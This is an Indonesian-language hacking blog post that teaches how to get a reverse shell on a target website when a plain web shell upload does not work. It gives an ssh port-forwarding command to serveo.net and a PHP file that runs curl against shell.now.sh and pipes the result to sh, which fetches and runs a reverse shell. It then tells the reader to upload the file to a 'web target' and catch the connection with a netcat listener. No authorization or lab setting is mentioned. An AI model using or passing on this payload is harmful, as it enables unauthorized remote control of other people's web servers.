Bypassing Upload Shell With Reserve Shell - Pixel-Code

Bypassing Upload Shell With Reserve Shell

Hello sobat pixel kembali lagi nih hehe, udah lama nggak post kan ya. Oke pada kesempatan kali ini gue mau ngasih tutorial Bypass Shell With Reverse shell. Mungkin kalian pernah upload shell tapi nggak pernah berhasil kan, Hanya uploader kalian yang terbaca, Huh! nyebelin bukan mungkin ini bisa menjadi referensi kalian. Lanjut gimana caranya dan apa aja yang di butuhkan simak step by stepnya ya kak.

Bahan - Bahan :
Serveo Disini
Netcat Disini

Pertama kalian setting dulu Serveo kalian, Nah loh kak kenapa harus Serveo? karena disini saya menggunakan Serveo untuk melakukan Port Forwading, Kalian juga bisa menggunakan Ngrok untuk pengganti Serveo. Lanjut kalian cukup command

ssh -R 3117:localhost:1337 pixelcode@serveo.net

Penjelasan:
3117 > Port Forwarder
1337 > Local Port

Jika berhasil maka tampilan akan seperti ini
Selanjutnya jika sudah berhasil kalian buat file extensi php dengan source code dibawah ini

<?php
system("curl https://shell.now.sh/IP-Attacker:1337 | sh")
?>


Penjelasan:
Kalian ganti "IP-Attacker" dengan host yang kalian dapat atau dengan Serveo.net dengan port yang kalian setting sebelumnya. Lihat contoh gambar jika tidak mengerti.

(Nb: Disini saya menggunakan dengan host yang saya dapat pada Serveo.net lihat gambar sebelumnya jika tidak mengerti.)

Jika sudah kalian buat kalian upload pada web target

Selanjutkan kalian setting netcat untuk melisten, Commandnya gimana kak? Gampang kok kalian cukup command nc -lnvp 1337


(Nb: Sesuaikan sama port yang kalian setting di Serveo)

Lanjut buka aksesna, Jika blank ato buffering itu berarti sukses

Kalian cek NetCat kalian dan boom Reserve Shell Berhasil!

Gimana cukup mudah bukan? Oke mungkin cukup sekian tutorial dari saya dont forget too share and See you next time byee~


0 Response to "Bypassing Upload Shell With Reserve Shell"

Post a Comment